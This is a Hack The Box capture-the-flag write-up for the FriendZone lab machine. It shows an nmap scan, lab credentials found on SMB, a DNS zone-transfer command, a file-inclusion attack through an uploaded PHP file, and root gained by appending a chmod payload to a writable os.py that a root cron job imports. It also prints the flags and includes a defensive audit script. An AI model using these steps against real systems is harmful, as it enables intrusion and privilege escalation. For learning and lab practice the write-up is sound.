Hack The Box: FriendZone machine write-up
Although this machine was rated as easy with 20 points, I found it really challenging and learnt a great deal in some areas, like DNS. It starts with us checking SMB and getting some credentials, then having to do a zone transfer in order to find an admin panel, after which we come across an LFI that leads to RCE. Then it's just a matter of realising that there is a cronjob running a Python script as root which imports the "os" library, so we can poison it and hence get to root.
The machine runs with ip 10.10.10.123.
Enumeration
First, I enumerate open ports to discover the services running in the machine:
nmap -sV -sC -oA nmap/initial 10.10.10.123
# Nmap 7.70 scan initiated Thu Feb 14 08:48:29 2019 as: nmap -sV -sC -oA nmap/initial friendzone
Nmap scan report for friendzone (10.10.10.123)
Host is up (0.041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-02-14T10:48:46+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-02-14 08:48:46
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 14 08:49:30 2019 -- 1 IP address (1 host up) scanned in 61.70 seconds
So many things, so let’s go one by one.
SMB server
I connected anonymously to the samba shares and discovered some interesting credentials. For that, I used SMBMap, a useful tool which lets the user scan all shares, list them recursively and even download files:
I tried to use the credentials in FTP and SSH, but no luck. Therefore, I decided to move on to the webserver on port 80.
Web server on port 80
The main page looked like this:
I tried to run dirbuster and came across what was a rabbit hole: a directory called wordpress that was empty. I tried to have a look at port 445, but nothing came up. It was time to enumerate port 53!
DNS enumeration
I was completely new to this, so I was advised to watch Ippsec's video of Bank (kudos to him). It indeed turned out to be useful, as the technique was the same: a zone transfer. What this attack does is the following: the attacker poses as a secondary (slave) DNS server and asks the server for the zone's DNS entries, and a misconfigured server that allows transfers from anyone hands them over. Hence, the attacker gets a bunch of useful information.
The command I used was:
dig axfr @10.10.10.123 friendzone.red
I used that domain because the main page showed an email address with the domain friendzoneportal.red and, after trying that and getting nothing, I removed the portal substring.
We can see some interesting domains, amongst which there is one that contains administrator! I added all of them to my /etc/hosts file.
Web server on port 445
After adding all the entries, I visited https://administrator1.friendzone.red/.
I entered the creds obtained through SMB: admin:WORKWORKHhallelujah@#.
After some enumeration with dirbuster I discovered a PHP script called timestamp in that directory, which gave me a clue about what was really happening: the pagename parameter includes a PHP script, in this case timestamp.php.
Getting user
With that in mind, it's easy to guess what to do: I just need to upload a PHP script to SMB (the Development share) and then try to include it through the pagename parameter. Simple, isn't it?
Well, it didn't turn out to be that easy, as I couldn't find the path of Development… After quite a lot of time, someone gave me a hint and told me to look at /etc/. And there it was! I made a simple PHP file called test.php and uploaded it to Development. The contents of the file were:
<?php echo "YESSSSS";?>
Then I accessed it with /etc/Development/test as the pagename parameter.
Okay, so now I just needed to upload a shell and listen with netcat!
And we get the user flag as www-data: a9ed20acecd6c5b6b52f474e15ae9a11.
Getting root
I started to enumerate the system and came across two interesting facts:
- There is a Python script in /opt/server-status/reporter.py:
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
- The /usr/lib/python2.7/os.py file could be edited!
I then used pspy, a tool to monitor processes without the need of root privileges, and got the following cronjob:
Okay, so we have a Python script that runs as root from a cronjob, and this script imports os, which we can write to. Seems obvious, right? It's only necessary to poison the library by modifying the source code of /usr/lib/python2.7/os.py.
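The root step only works because a standard-library file on the interpreter's import path was writable by an unprivileged user while root ran a script that imported it. The following audit script is an added example (not part of the original write-up or of the machine) that walks a set of module directories (by default the running interpreter's sys.path) and reports .py files that a non-root account could overwrite; the trusted_uid parameter and the reason strings are my own choices:

```python
"""Report Python module files that an unprivileged user could overwrite.

Added example, not from the original write-up. On FriendZone,
/usr/lib/python2.7/os.py was writable by www-data while a root cron job
imported it. A file is reported when it is world- or group-writable, or when
it is not owned by the trusted UID (root by default).
"""
import os
import stat
import sys


def writable_modules(dirs=None, trusted_uid=0):
    """Return a sorted list of (path, reason) for risky .py files under dirs.

    dirs defaults to sys.path; entries that are not directories are skipped.
    """
    candidates = dirs if dirs is not None else sys.path
    findings = []
    for base in candidates:
        if not base or not os.path.isdir(base):
            continue
        for root, _subdirs, files in os.walk(base):
            for name in files:
                if not name.endswith(".py"):
                    continue
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable; nothing to report
                if stat.S_ISLNK(st.st_mode):
                    continue  # link targets are checked where they live
                if st.st_mode & stat.S_IWOTH:
                    findings.append((path, "world-writable"))
                elif st.st_mode & stat.S_IWGRP:
                    findings.append((path, "group-writable"))
                elif st.st_uid != trusted_uid:
                    findings.append((path, "owned by uid %d" % st.st_uid))
    return sorted(findings)


if __name__ == "__main__":
    # Usage: python audit_modules.py [dir ...]   (no args: audit sys.path)
    for path, reason in writable_modules(sys.argv[1:] or None):
        print("%s: %s" % (reason, path))
```

Run it as root on the host being audited so that every directory on sys.path is readable; any hit against a cron job's interpreter is a privilege-escalation path like the one used here.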
I ran the following command:
echo "system('chmod 777 -R /root')" >> /usr/lib/python2.7/os.py
I waited and voilà! I could now access the root directory and read the flag:
And finally we can cat root.txt:
b0e6c60b82cf96e9855ac1656a9e90c7
Definitely one of the most interesting and educational machines I've ever rooted! I hope you learnt something as well reading the write-up!